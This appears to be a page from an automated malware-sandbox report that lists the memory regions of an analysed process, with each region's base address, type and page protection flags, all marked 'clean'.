clean
7FF001D0000
unkown
page execute and read and write
clean
7FF00250000
unkown
page execute and read and write
clean
3C23000
unkown
page read and write
clean
7EFDF000
unkown
page read and write
clean
608000
unkown
page read and write
clean
224C000
heap private
page read and write
clean
2AF0000
heap private
page execute and read and write
clean
2EED000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
7FFFFFC0000
unkown image
page readonly
clean
27C0000
unkown
page read and write
clean
10000
unkown image
page read and write
clean
3C09000
unkown
page read and write
clean
3826000
unkown
page read and write
clean
629000
unkown
page read and write
clean
4F49000
unkown
page read and write
clean
46E000
unkown
page read and write
clean
1C960000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
2D0000
unkown
page read and write
clean
1C95E000
unkown
page read and write
clean
2956000
unkown
page read and write
clean
770000
unkown image
page readonly
clean
12FF1000
unkown
page read and write
clean
180000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
2310000
heap private
page read and write
clean
6A0000
unkown
page read and write
clean
270000
heap default
page read and write
clean
7EFD0000
unkown image
page readonly
clean
30B4000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
30AC000
unkown
page read and write
clean
284F000
unkown
page read and write
clean
4E0000
heap private
page read and write
clean
287E000
unkown
page read and write
clean
325A000
unkown
page read and write
clean
3215000
unkown
page read and write
clean
1C750000
unkown
page read and write
clean
2EAF000
unkown
page read and write
clean
7EFC0000
unkown image
page readonly
clean
43A0000
unkown
page read and write
clean
3556000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
200000
unkown image
page readonly
clean
7FFFFFB2000
unkown image
page readonly
clean
200000
unkown image
page readonly
clean
7EFE0000
unkown image
page readonly
clean
1C750000
unkown
page read and write
clean
393F000
unkown
page read and write
clean
33A1000
unkown
page read and write
clean
7F6000
heap private
page read and write
clean
3758000
unkown
page read and write
clean
31E3000
unkown
page read and write
clean
7FF000D0000
unkown
page read and write
clean
1C750000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
4F40000
unkown
page read and write
clean
1C750000
unkown
page read and write
clean
560000
unkown
page read and write
clean
7EFB0000
unkown image
page readonly
clean
2FAF000
unkown
page read and write
clean
10B000
unkown
page read and write
clean
23D0000
unkown image
page readonly
clean
3942000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
391F000
unkown
page read and write
clean
27B0000
unkown
page read and write
clean
452F000
unkown
page read and write
clean
3108000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
326000
unkown
page read and write
clean
180000
unkown
page read and write
clean
50000
unkown image
page readonly
clean
30EE000
unkown
page read and write
clean
12EAC000
unkown
page read and write
clean
2B0000
unkown
page read and write
clean
1BAE0000
unkown
page read and write
clean
4F30000
unkown
page read and write
clean
7FE000
heap default
page read and write
clean
202000
unkown image
page execute read
clean
2149000
unkown
page read and write
clean
2A40000
unkown
page read and write
clean
1E30000
heap private
page read and write
clean
10000
unkown image
page read and write
clean
2F02000
unkown
page read and write
clean
40000
unkown image
page readonly
clean
2BAA000
heap private
page execute and read and write
clean
3198000
unkown
page read and write
clean
29C9000
unkown
page read and write
clean
7EFC2000
unkown image
page readonly
clean
E5000
unkown
page read and write | page guard
clean
3443000
unkown
page read and write
clean
4C4E000
unkown
page read and write
clean
2C7F000
unkown
page read and write
clean
325E000
unkown
page read and write
clean
22F0000
unkown
page read and write
clean
2EA0000
unkown image
page readonly
clean
31A7000
unkown
page read and write
clean
291F000
unkown
page read and write
clean
3113000
unkown
page read and write
clean
40000
unkown image
page readonly
clean
2BA0000
heap private
page execute and read and write
clean
3481000
unkown
page read and write
clean
3610000
heap private
page read and write
clean
1C6AE000
unkown
page read and write
clean
7FF00240000
unkown
page execute and read and write
clean
7EFD0000
unkown image
page readonly
clean
7FF00260000
unkown
page read and write
clean
2944000
unkown
page read and write
clean
7FF00240000
unkown
page execute and read and write
clean
37BF000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
3767000
unkown
page read and write
clean
7EFD0000
unkown image
page readonly
clean
10000
unkown image
page read and write
clean
735000
unkown
page read and write
clean
1C75D000
unkown
page read and write
clean
4F31000
unkown
page read and write
clean
200000
unkown image
page readonly
clean
1FD0000
unkown image
page read and write
clean
629000
unkown
page read and write
clean
3BDA000
unkown
page read and write
clean
3780000
unkown
page read and write
clean
7FF001E0000
unkown
page read and write
clean
12C25000
unkown
page read and write
clean
1E4F000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
7FF000E5000
unkown
page read and write
clean
26F0000
unkown image
page readonly
clean
480000
heap private
page execute and read and write
clean
27C0000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
3517000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
1C750000
unkown
page read and write
clean
2C20000
unkown
page read and write
clean
274000
unkown image
page readonly
clean
2954000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
21C0000
unkown
page read and write
clean
1B820000
unkown
page read and write
clean
2F9B000
unkown
page read and write
clean
560000
unkown image
page readonly
clean
4E4000
heap private
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
30000
unkown image
page readonly
clean
7EFC2000
unkown image
page readonly
clean
2160000
unkown
page read and write
clean
2C21000
unkown
page read and write
clean
2F9F000
unkown
page read and write
clean
1F0000
unkown
page execute and read and write
clean
316F000
unkown
page read and write
clean
2E69000
unkown
page read and write
clean
7FF00022000
unkown
page execute and read and write
clean
22C0000
unkown image
page readonly
clean
A40000
unkown image
page readonly
clean
7EFE0000
unkown image
page readonly
clean
3743000
unkown
page read and write
clean
1C960000
unkown
page read and write
clean
1C0000
unkown image
page readonly
clean
6A0000
unkown
page read and write
clean
184000
heap private
page read and write
clean
333D000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
7EFB2000
unkown image
page readonly
clean
7EFD0000
unkown image
page readonly
clean
1DF0000
heap private
page read and write
clean
316000
unkown
page read and write
clean
202000
unkown image
page execute read
clean
1D45000
heap private
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
6A0000
unkown
page read and write
clean
5B0000
heap default
page read and write
clean
30FA000
unkown
page read and write
clean
7FF00160000
unkown
page execute and read and write
clean
1BAC0000
heap private
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
7FFFFFB2000
unkown image
page readonly
clean
790000
unkown
page read and write
clean
2060000
heap private
page read and write
clean
376A000
unkown
page read and write
clean
34CF000
unkown
page read and write
clean
287000
unkown image
page readonly
clean
7FFFFFB2000
unkown image
page readonly
clean
7FFFFFC0000
unkown image
page readonly
clean
800000
unkown image
page readonly
clean
5730000
unkown
page read and write
clean
2F1F000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
37BF000
unkown
page read and write
clean
30000
unkown image
page readonly
clean
200000
unkown image
page readonly
clean
720000
unkown
page read and write
clean
200000
unkown image
page readonly
clean
27C0000
unkown
page read and write
clean
2FB5000
unkown
page read and write
clean
2E6000
heap default
page read and write
clean
2EBF000
unkown
page read and write
clean
2E7F000
unkown
page read and write
clean
4870000
heap private
page read and write
clean
22ED000
unkown
page read and write
clean
2020000
unkown
page read and write
clean
31FF000
unkown
page read and write
clean
39AD000
unkown
page read and write
clean
372F000
unkown
page read and write
clean
2E7C000
unkown
page read and write
clean
33EA000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
2F0F000
unkown
page read and write
clean
30DF000
unkown
page read and write
clean
49EC000
unkown
page read and write
clean
2B70000
unkown
page read and write
clean
50000
unkown image
page readonly
clean
2EB3000
unkown
page read and write
clean
30EB000
unkown
page read and write
clean
1F40000
unkown image
page readonly
clean
470000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
22F000
heap default
page read and write
clean
170000
unkown
page read and write
clean
366B000
unkown
page read and write
clean
2F69000
unkown
page read and write
clean
60D000
unkown
page read and write
clean
12E81000
unkown
page read and write
clean
2212000
heap private
page read and write
clean
2C5F000
unkown
page read and write
clean
2340000
unkown
page read and write
clean
670000
unkown image
page readonly
clean
361000
heap default
page read and write
clean
7FF0002C000
unkown
page execute and read and write
clean
1C960000
unkown
page read and write
clean
7EFDF000
unkown
page read and write
clean
7FF001C0000
unkown
page read and write
clean
21E0000
unkown
page read and write
clean
2F94000
unkown
page read and write
clean
27E0000
unkown image
page readonly
clean
18D000
unkown
page execute and read and write
clean
3155000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
470000
unkown
page read and write
clean
234000
heap private
page read and write
clean
2F53000
unkown
page read and write
clean
1C64E000
unkown
page read and write
clean
1C960000
unkown
page read and write
clean
1C960000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
1CB0000
heap private
page read and write
clean
13C000
unkown
page read and write
clean
2E7E000
unkown
page read and write | page guard
clean
31C9000
unkown
page read and write
clean
3952000
unkown
page read and write
clean
7EFE0000
unkown image
page readonly
clean
2B55000
unkown
page read and write
clean
629000
unkown
page read and write
clean
320000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
1B73D000
unkown
page read and write
clean
310000
unkown
page read and write
clean
212E000
unkown
page read and write | page guard
clean
38DD000
unkown
page read and write
clean
7FF0001A000
unkown
page execute and read and write
clean
580E000
unkown
page read and write
clean
2F7B000
unkown
page read and write
clean
2020000
unkown
page read and write
clean
130D0000
unkown
page read and write
clean
7EFC2000
unkown image
page readonly
clean
318A000
unkown
page read and write
clean
7FA000
heap default
page read and write
clean
7EFB2000
unkown image
page readonly
clean
3543000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
7FF00270000
unkown
page execute and read and write
clean
40000
unkown image
page readonly
clean
268000
heap default
page read and write
clean
7EFC0000
unkown image
page readonly
clean
5D0000
unkown image
page readonly
clean
26A0000
unkown
page read and write
clean
60000
unkown image
page readonly
clean
310000
unkown
page read and write
clean
1C960000
unkown
page read and write
clean
50000
unkown image
page readonly
clean
1C770000
heap private
page read and write
clean
2F0000
unkown
page read and write
clean
1C750000
unkown
page read and write
clean
31C8000
unkown
page read and write
clean
320000
unkown
page read and write
clean
7FF001C0000
unkown
page read and write
clean
335A000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
7FF001F0000
unkown
page read and write
clean
31BC000
unkown
page read and write
clean
274000
unkown image
page readonly
clean
3913000
unkown
page read and write
clean
38D4000
unkown
page read and write
clean
1B2F0000
unkown
page read and write
clean
397A000
unkown
page read and write
clean
B3000
unkown
page execute and read and write
clean
B0000
unkown image
page read and write
clean
26A0000
unkown
page read and write
clean
7EFB0000
unkown image
page readonly
clean
2FE1000
unkown
page read and write
clean
1C00000
unkown image
page readonly
clean
26A0000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
60000
unkown image
page readonly
clean
2170000
unkown
page execute and read and write
clean
5330000
heap private
page read and write
clean
3C34000
unkown
page read and write
clean
37A0000
unkown
page read and write
clean
2E0000
unkown
page read and write
clean
22F0000
unkown
page read and write
clean
3933000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
5730000
unkown
page read and write
clean
37BC000
unkown
page read and write
clean
20000
unkown
page read and write
clean
2FFA000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
1C750000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
12ED2000
unkown
page read and write
clean
287000
unkown image
page readonly
clean
20000
unkown
page read and write
clean
394F000
unkown
page read and write
clean
358000
heap default
page read and write
clean
1C960000
unkown
page read and write
clean
1C960000
unkown
page read and write
clean
7EFB2000
unkown image
page readonly
clean
2360000
heap private
page execute and read and write
clean
313000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
1C960000
unkown
page read and write
clean
1C750000
unkown
page read and write
clean
7FF001A0000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
34C000
heap default
page read and write
clean
20000
unkown image
page read and write
clean
202000
unkown image
page execute read
clean
3C3E000
unkown
page read and write
clean
450000
unkown image
page readonly
clean
50FE000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
3360000
unkown
page read and write
clean
397F000
unkown
page read and write
clean
7EFC0000
unkown image
page readonly
clean
39DB000
unkown
page read and write
clean
7EFC2000
unkown image
page readonly
clean
7FF00260000
unkown
page read and write
clean
5BFE000
unkown
page read and write | page guard
clean
1C960000
unkown
page read and write
clean
B20000
unkown image
page readonly
clean
197000
unkown
page execute and read and write
clean
274000
unkown image
page readonly
clean
1DE0000
unkown
page read and write
clean
1C960000
unkown
page read and write
clean
370000
unkown
page read and write
clean
3961000
unkown
page read and write
clean
720000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
1B7F3000
unkown
page read and write
clean
2F38000
unkown
page read and write
clean
20E0000
unkown
page read and write
clean
234000
heap private
page read and write
clean
3280000
unkown
page read and write
clean
2B40000
unkown
page read and write
clean
B9F000
unkown
page read and write
clean
2C1F000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
4000000
unkown
page read and write
clean
30000
unkown image
page readonly
clean
29C4000
unkown
page read and write
clean
1ED0000
unkown image
page readonly
clean
26A0000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
1D20000
unkown image
page readonly
clean
529E000
unkown
page read and write
clean
23CD000
unkown
page read and write
clean
40000
unkown image
page readonly
clean
1B796000
unkown
page read and write
clean
382D000
unkown
page read and write
clean
20000
unkown image
page readonly
clean
12C4C000
unkown
page read and write
clean
7FF00112000
unkown
page execute and read and write
clean
38B7000
unkown
page read and write
clean
7FF001E7000
unkown
page read and write
clean
31D7000
unkown
page read and write
clean
38F9000
unkown
page read and write
clean
3514000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
2B67000
unkown image
page readonly
clean
7FFFFFB0000
unkown image
page readonly
clean
63E000
unkown
page read and write
clean
287000
unkown image
page readonly
clean
22AD000
unkown
page read and write
clean
2180000
heap private
page read and write
clean
3428000
unkown
page read and write
clean
12D31000
unkown
page read and write
clean
60000
unkown image
page readonly
clean
7FF001F0000
unkown
page read and write
clean
355F000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
720000
unkown image
page read and write
clean
26A0000
unkown
page read and write
clean
7EFC0000
unkown image
page readonly
clean
1B920000
unkown
page read and write
clean
3E0000
unkown image
page readonly
clean
2BF000
unkown
page read and write
clean
2E81000
unkown
page read and write
clean
31FB000
unkown
page read and write
clean
7B0000
heap default
page read and write
clean
27C0000
unkown
page read and write
clean
7FF00112000
unkown
page execute and read and write
clean
22A2000
heap private
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
2020000
unkown image
page readonly
clean
B4000
unkown
page read and write
clean
30000
unkown image
page readonly
clean
BD000
unkown
page execute and read and write
clean
39B7000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
35CD000
unkown
page read and write
clean
209B000
heap private
page read and write
clean
2F1B000
unkown
page read and write
clean
38E000
heap default
page read and write
clean
D0000
unkown image
page read and write
clean
2D60000
unkown image
page readonly
clean
3540000
unkown
page read and write
clean
2E60000
unkown
page read and write
clean
3162000
unkown
page read and write
clean
7EFB0000
unkown image
page readonly
clean
980000
unkown image
page readonly
clean
7FF000E5000
unkown
page read and write
clean
780000
unkown
page read and write
clean
287000
unkown image
page readonly
clean
7B7000
heap default
page read and write
clean
790000
unkown
page read and write
clean
7FF00150000
unkown
page read and write
clean
2F2C000
unkown
page read and write
clean
31E7000
unkown
page read and write
clean
1B7D9000
unkown
page read and write
clean
7FF000D2000
unkown
page execute and read and write
clean
5D4000
heap default
page read and write
clean
4F0000
unkown image
page readonly
clean
7FFFFFC0000
unkown image
page readonly
clean
317B000
unkown
page read and write
clean
31F4000
unkown
page read and write
clean
37A9000
unkown
page read and write
clean
104000
heap private
page read and write
clean
7FF0001A000
unkown
page execute and read and write
clean
7EFC0000
unkown image
page readonly
clean
3141000
unkown
page read and write
clean
2C4F000
unkown
page read and write
clean
30D2000
unkown
page read and write
clean
7D4000
heap default
page read and write
clean
382A000
unkown
page read and write
clean
274000
unkown image
page readonly
clean
3546000
unkown
page read and write
clean
37B6000
unkown
page read and write
clean
1EC0000
heap private
page execute and read and write
clean
321B000
unkown
page read and write
clean
7FF00190000
unkown
page execute and read and write
clean
7FF000D2000
unkown
page execute and read and write
clean
2000000
heap private
page read and write
clean
2F47000
unkown
page read and write
clean
1F30000
heap private
page read and write
clean
7BA000
heap default
page read and write
clean
27C0000
unkown
page read and write
clean
4F44000
unkown
page read and write
clean
350000
heap default
page read and write
clean
2F2F000
unkown
page read and write
clean
31ED000
unkown
page read and write
clean
2B7000
heap default
page read and write
clean
315B000
unkown
page read and write
clean
3218000
unkown
page read and write
clean
1C6CE000
unkown
page read and write
clean
10000
unkown image
page read and write
clean
7FFFFF10000
unkown
page execute and read and write
clean
7EFC0000
unkown image
page readonly
clean
30B9000
unkown
page read and write
clean
470000
unkown
page read and write
clean
720000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
3151000
unkown
page read and write
clean
7F0000
heap private
page read and write
clean
377A000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
2317000
heap private
page read and write
clean
192000
unkown
page read and write
clean
200000
unkown image
page readonly
clean
2FBB000
unkown
page read and write
clean
7FFFFF00000
unkown
page execute and read and write
clean
3983000
unkown
page read and write
clean
22B0000
unkown image
page readonly
clean
72D000
unkown
page read and write
clean
2B90000
unkown
page read and write
clean
C9000
heap private
page read and write
clean
E6000
unkown
page read and write
clean
27F0000
unkown image
page readonly
clean
7FF00250000
unkown
page execute and read and write
clean
26A0000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
1C960000
unkown
page read and write
clean
26A0000
unkown
page read and write
clean
356000
heap default
page read and write
clean
287000
unkown image
page readonly
clean
3507000
unkown
page read and write
clean
1DB0000
unkown image
page readonly
clean
202000
unkown image
page execute read
clean
2065000
heap private
page read and write
clean
3939000
unkown
page read and write
clean
730000
unkown
page read and write
clean
36C9000
unkown
page read and write
clean
1CE4000
heap private
page read and write
clean
3241000
unkown
page read and write
clean
398F000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
1B80B000
unkown
page read and write
clean
2FAC000
unkown
page read and write
clean
5E0000
unkown image
page readonly
clean
7FF00022000
unkown
page execute and read and write
clean
26A0000
unkown
page read and write
clean
78C000
unkown
page read and write
clean
287000
unkown image
page readonly
clean
390E000
unkown
page read and write
clean
38C7000
unkown
page read and write
clean
7EFC2000
unkown image
page readonly
clean
2E7F000
unkown
page read and write
clean
2F5C000
unkown
page read and write
clean
7FF00170000
unkown
page execute and read and write
clean
3195000
unkown
page read and write
clean
1B7D4000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
3793000
unkown
page read and write
clean
315B000
unkown
page read and write
clean
7EFB2000
unkown image
page readonly
clean
560000
unkown image
page readonly
clean
1C960000
unkown
page read and write
clean
1E2B000
heap private
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
274000
unkown image
page readonly
clean
293F000
unkown
page read and write
clean
30DC000
unkown
page read and write
clean
6EC000
unkown
page read and write
clean
7EFB2000
unkown image
page readonly
clean
7A0000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
2AF000
heap default
page read and write
clean
266000
unkown
page read and write
clean
37A3000
unkown
page read and write
clean
730000
unkown
page read and write
clean
2220000
unkown image
page readonly
clean
60000
unkown image
page readonly
clean
446000
unkown
page read and write
clean
351D000
unkown
page read and write
clean
470000
unkown
page read and write
clean
360000
unkown
page read and write
clean
30C6000
unkown
page read and write
clean
7FF00170000
unkown
page execute and read and write
clean
54D000
unkown
page execute and read and write
clean
570000
unkown image
page readonly
clean
27C0000
unkown
page read and write
clean
27C0000
unkown
page read and write
clean
1BA2A000
unkown
page read and write
clean
3099000
unkown
page read and write
clean
21C0000
unkown
page read and write
clean
C0000
heap private
page read and write
clean
7EFB2000
unkown image
page readonly
clean
1D0000
unkown image
page readonly
clean
287000
unkown image
page readonly
clean
2160000
unkown
page read and write
clean
1E35000
heap private
page read and write
clean
60000
unkown image
page readonly
clean
2C0000
unkown image
page readonly
clean
3790000
unkown
page read and write
clean
460000
unkown image
page readonly
clean
7FFFFFC2000
unkown image
page readonly
clean
230000
unkown
page read and write
clean
318F000
unkown
page read and write
clean
680000
unkown image
page readonly
clean
7EFE0000
unkown image
page readonly
clean
2D3000
heap default
page read and write
clean
27C0000
unkown
page read and write
clean
398A000
unkown
page read and write
clean
There are 980 hidden memdumps, click here to show them.